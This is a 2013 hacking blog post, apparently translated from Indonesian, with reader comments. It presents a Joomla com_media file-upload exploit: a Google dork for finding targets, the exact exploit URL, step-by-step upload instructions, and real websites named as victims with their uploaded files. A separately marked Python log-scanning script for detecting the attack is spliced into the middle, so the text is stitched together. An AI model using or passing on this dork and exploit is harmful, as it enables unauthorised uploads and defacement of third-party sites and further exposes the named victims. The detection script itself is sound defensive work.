
LinuxSec Exploit

Nothing is Ever Locked


Com_Media Exploit Technique on the Joomla CMS

May 15, 2013 by Jack Wilder 28 Comments

Com_Media Exploit Technique on the Joomla CMS – This time I will share one way to exploit the Joomla CMS, namely the com_media exploit. I picked up this technique while reading the blog of one of the ISD members, SultanHaikal. Unfortunately his blog has since been deleted, so I am trying to share it again here.
OK, let's get straight to it.
What you need:
Dork : inurl:com_media site:com [feel free to come up with your own dorks. Your creativity will determine how many vulnerable sites you find]. :p
Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

1. OK. Go hunting for a target on Google with the dork above. As an example, I picked http://www.skylinepark.org .
2. Then append the exploit, so it becomes http://www.skylinepark.org/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
3. You will then see the upload form. See the screenshot:

4. The file types that can be uploaded are .txt, .jpg, .gif and .png. HTML and PHP files cannot be uploaded. :p I tried uploading a .txt file.
5. Now let's look at the result. The file is located at [localhost]/images/[file.txt].
Ex : http://www.skylinepark.org/images/lol.txt, http://www.magicrete.in/images/lol.txt
6. Done.

Reference : http://komandanseo.blogspot.com/
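The request sequence in the steps above leaves a recognisable trail in web server access logs. The following is an added example, not code from the original post: it scans combined-format log lines for the com_media image view opened with tmpl=component, for POSTs to com_media, and for later fetches under /images/ with the extensions the post lists, grouped by client IP. The log lines, the IP addresses and the POST URL are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (documentation IPs, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [15/May/2013:10:01:02 +0000] "GET /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder= HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [15/May/2013:10:01:40 +0000] "POST /index.php?option=com_media&tmpl=component HTTP/1.1" 303 0 "-" "Mozilla/5.0"
203.0.113.7 - - [15/May/2013:10:02:05 +0000] "GET /images/lol.txt HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.9 - - [15/May/2013:10:03:00 +0000] "GET /images/banner.png HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
198.51.100.9 - - [15/May/2013:10:03:10 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
UPLOADABLE = (".txt", ".jpg", ".gif", ".png")  # extensions the post says are accepted

def classify(method, target):
    """Return an event label for a request, or None if it is not of interest."""
    url = urlsplit(target)
    qs = parse_qs(url.query, keep_blank_values=True)
    path = url.path.lower()
    if qs.get("option") == ["com_media"]:
        if method == "POST":
            return "media_post"   # any write to com_media (URL shape is an assumption)
        if qs.get("view") == ["images"] and qs.get("tmpl") == ["component"]:
            return "media_form"   # the upload form URL given in the post
    elif method == "GET" and path.startswith("/images/") and path.endswith(UPLOADABLE):
        return "images_fetch"
    return None

def suspicious_clients(log_text):
    """Map client IP -> ordered events, keeping only clients that reached com_media."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, method, target, status = m.groups()
        label = classify(method, target)
        if label and status[0] in "23":   # only requests the server accepted
            events[ip].append((label, target.split("?")[0]))
    return {ip: ev for ip, ev in events.items()
            if any(label.startswith("media_") for label, _ in ev)}

if __name__ == "__main__":
    for ip, ev in suspicious_clients(SAMPLE_LOG).items():
        print(ip, ev)
```

Logged-in editors also reach com_media through the article editor, so hits need correlating with session or authentication data before they are treated as abuse.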

Filed Under: Uncategorized Tagged With: Hacking


Comments

  1. ope says

    May 16, 2013 at 12:58 am

    What is the com_media exploit?

    • chiaki says

      May 16, 2013 at 4:35 am

      ???

    • Agung Skat Nevis says

      May 16, 2013 at 11:27 am

      Visit back 😀
      And requesting permission to copy-paste =)

      http://www.bloggerjava.net/

  2. Wahyu Dwi says

    May 16, 2013 at 1:08 am

    I don't really get Joomla, bro 😀 hehehe, but I'll just learn it slowly 🙂

    • chiaki says

      May 16, 2013 at 4:36 am

      Great.

  3. Bung Penho says

    May 16, 2013 at 2:08 am

    If possible, could you go into more detail about what this technique is for?

    • chiaki says

      May 16, 2013 at 4:37 am

      What label is this post under? :p

  4. Info Seputar Bola says

    May 16, 2013 at 3:16 am

    Thanks for sharing, bro. It turns out the bug is quite easy to get through..

    • chiaki says

      May 17, 2013 at 1:19 am

      That's right, bro.

  5. Rohis Facebook says

    May 16, 2013 at 3:53 am

    Just following along, I can't comment on anything because I don't understand it *smile

    • chiaki says

      May 17, 2013 at 1:20 am

      OK.

  6. imam sya' roni says

    May 16, 2013 at 7:04 am

    Carrying on Sultan Haikal's legacy, bro 🙂 nice

    • chiaki says

      May 17, 2013 at 1:22 am

      Thanks bro.

  7. mifta khuddin says

    May 16, 2013 at 8:25 am

    Why can't PHP and HTML be uploaded..??

    • chiaki says

      May 17, 2013 at 1:20 am

      Don't know. :3

  8. Mas Nady says

    May 16, 2013 at 9:12 am

    Afternoon visit, just following along, friend… I don't understand it, hahahaha

  9. Muroi El-Barezy says

    May 16, 2013 at 9:17 am

    Wow, Joomla. I think I'll just follow along for now, bro. Happy blogging

  10. aji Fauzan says

    May 16, 2013 at 10:22 am

    Awesome, bro (y)

  11. Djangkaru Bumi says

    May 16, 2013 at 1:58 pm

    Learning Joomla gives me a headache.

  12. Muhammad Rafly says

    May 16, 2013 at 2:31 pm

    Bro, let's exchange links..
    I've already put the Madura link on my blog, check it out..
    http://mrr-cyber.blogspot.com/p/link-exchange_1033.html

    • chiaki says

      May 17, 2013 at 2:23 am

      Later tonight, bro. I'm online on my phone right now. :3

    • Muhammad Rafly says

      May 17, 2013 at 6:36 am

      OK, bro..

  13. Wahyu Dwi says

    May 17, 2013 at 2:58 am

    Morning visit, bro 🙂

  14. Cirebon-Cyber4rt says

    May 17, 2013 at 11:08 am

    I like posts like this the most hehehe 😀

    Oh, and it's been a while since I last blogwalked here. How are you, bro? 🙂

    • chiaki says

      May 18, 2013 at 5:00 am

      I'm good, bro. 😀

  15. Mas Nady says

    May 17, 2013 at 12:58 pm

    Wow, I'll just follow along, bro.. I'm still a complete beginner with this kind of thing hehehehe

  16. Anonim says

    May 30, 2013 at 4:57 pm

    Lame blog

    • Anonim says

      June 5, 2013 at 8:20 am

      Damn.
